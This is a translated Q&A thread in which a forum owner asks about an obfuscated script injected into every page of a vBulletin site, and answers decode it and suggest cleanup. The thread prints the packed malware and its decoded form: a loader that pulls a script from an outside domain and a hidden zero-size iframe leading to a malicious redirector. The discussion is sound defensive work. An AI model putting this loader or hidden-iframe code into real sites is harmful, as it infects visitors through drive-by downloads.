javascript - 从网站中删除恶意软件

Question

我的网站 3dsforums.com 已被标记为包含恶意软件的攻击站点。根据谷歌网站管理员工具，这是被注入到每个页面的可疑代码：

<script>eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c ]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3 1=4.5(\'6\');1.7=\'8://9-a.b/ c.d.1\';3 2=4.e(\'2\')[0];2.f(1);',16,16,'|js|head|var|document|createElement|script|src|http|javascript|collection|in|jquery|compatibility|getElementsByTagName|appendChild'.split('|'),0,{}))</script>

因此，我有两个问题：

这实际上是违规代码吗？

以及如何删除它？

我似乎无法通过 vBulletin 中的模板或通过 phpmyadmin 找到它，所以我不知道应该做什么。

谢谢你的帮助。

Answer 1

JS Beautifier将其解压缩为：

var js = document.createElement('script');
js.src = 'http://javascript-collection.in/ jquery.compatibility.js';
var head = document.getElementsByTagName('head')[0];
head.appendChild(js);

它看起来很可疑（谁会混淆它？），所以我认为是的，这是问题所在，你应该删除它。

编辑：现在恶意站点已备份，我可以分析其余部分：它似乎添加了一个iframe：

var iframe = document.createElement('iframe');
iframe.src = 'http://gamessilver.in/in.cgi?walter';
iframe.width = 0;
iframe.height = 0;
iframe.vspace = 0;
iframe.hspace = 0;
iframe.frameborder = 0;
iframe.marginheight = 0;
iframe.marginwidth = 0;
var head = document.getElementsByTagName('head')[0];
head.appendChild(iframe);

将其附加到head.

如果不是很可利用，该in.cgi脚本似乎会重定向到 Google 。User-Agent否则，它会重定向到另一个恶意网站。

iframe它继续以许多s分支。他们中的许多人什么都不做（虽然当时我只是User-Agent在 WinXP 上尝试 MSIE 6），但我最终还是使用了两个 Java 小程序。当我反编译它们时，所有的名字都被弄乱了，我没有费心去弄清楚它在做什么。

Answer 2

您应该做的第一件事是更改您的 FTP 或 SSH 登录名和密码。

上面看起来像是一个 FTP 漏洞利用。看起来您的操作系统更新已经过时，或者您正在让全世界都写入您的文件。

即使您覆盖了文件，问题也可能会再次出现。所以我强烈建议检查

1. 请注意相关文件的最后修改日期。
2. 检查你的 FTP、SSH、访问日志，看看你是否能找到可疑的东西。1a。立即删除对所有站点文件的写入权限。这样做是为了防范类似的攻击。1b。从备份覆盖您的文件
3. 如果您的 apache 或您正在使用的任何网络服务器没有挂起的更新。
4. 检查您网站的文件权限
5. 立即更改您的 FTP 密码

建议：将您的密码更改为强密码。例如 KLiof*(&^paswl

Answer 3

它实际上隐藏在第 6844 和 6845 行的 include/functions.php 中，这两行被替换</head>为their script+</head>

很难找到，也很聪明。

Answer 4

我解决了这个问题。您必须在站点文件中找到并删除带有阴影字符串的Base64函数。它从字符串中解码这个脚本。